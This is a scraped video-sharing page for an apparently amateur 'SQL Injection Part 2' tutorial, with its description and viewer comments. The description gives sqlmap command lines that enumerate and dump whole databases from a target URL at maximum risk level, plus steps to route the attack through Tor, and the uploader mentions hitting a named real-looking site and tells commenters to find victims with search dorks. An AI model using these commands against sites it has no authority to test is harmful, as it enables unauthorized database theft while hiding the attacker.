Alert icon
We're changing our privacy policy. This stuff matters.  Learn more  Dismiss

SQL Injection Part 2

Loading...

Sign in or sign up now!
Alert icon
Upgrade to the latest Flash Player for improved playback performance. Upgrade now or more info.
4,879
Loading...
Alert icon
Sign in or sign up now!
Alert icon

Uploaded by on Aug 26, 2011

sql injection done in a new site... not on nepalicollections (dot) com

i made a mistake there... damn.. instead of yboa i wrote ybox lol.... so it took so long time.. hope u guys dont make the same mistake :p
have fun

to increase risk value
./sqlmap.py -u http:\\url --tor --dbs --level=5 --risk=3

use tor.. if u have tor already opened and connected

- Criadlr

music... Psapp - Hi

how to use tor in sqlmap
@FlaverFx 1. Edit the repository to the list
- vim /etc/apt/sources.list

2. Add tor's repository to the list
- deb http://deb.torprojec...http://deb.torproject.org/torproject.org lucid main

3. Add gpg key and add into the key list.
- gpg --keyserver keys.gnupg.net --recv 886DDD89
- gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -

4. Update the package list and Install tor packages.
- apt-get update & apt-get install tor tor-geoipdb

5. Get the config file of polipo from tor website and rename or remove the old config.
- wget https://gitweb.torpr...https://gitweb.torproject.org/torbrowser.git/blob_plai...
- mv config config-bak
- cp polipo.conf config

6. Try to use sqlmap with "-tor" option.
- cd /pentest/web/scanners/sqlmap
- ./sqlmap.py -u "http://target.com/cart.php?id=1" --dump-all -tor

Category:

Education

Tags:

License:

Standard YouTube License

Link to this comment:

Share to:

Uploader Comments (pratiksrc)

  • how do you use tor with it do you just use it in the one string or do you have to type on every line -tor

  • @FlaverFx i have posted in description after yur request.. enjoy - CriAdlr

  • @pratiksrc i have a question, when i dont have the php?id= in the link, but exist a Database at this server, its work too or i need a other way?

  • @BimBaem try using any other dorks.... see part 1 of this vid under description.... theres lots of them.. good luck.. and remember hking aint easy.... u have to try hard :D

  • Hi, could You tell me who is that song? pleasss ;)

    ofcourse realy thanks for a good job with this tutorials

  • @iwoneo Music is in the description :D cheers

see all

All Comments (13)

Sign In or Sign Up now to post a comment!
  • 1:18 the db show yboa You Fail, you try to scanner db name ybox !!

  • subscribed.. :D

  • I like that sign (:D) too...! cheers

  • GRacias man gran tutorial esperemos nuevos tutoriales con el BT 5

  • @pratiksrc dude i cant follow that very well :(

  • how did u use tor ..the tor browser add in or the tor bundle for ubuntu....can u make a video on how to install tor for backtrack5 and how to use it.

Loading...
Alert icon
0 / 00Unsaved Playlist Return to active list
    1. Your queue is empty. Add videos to your queue using this button:
      or sign in to load a different list.
    Loading...Loading...Saving...
    • Clear all videos from this list
    • Learn more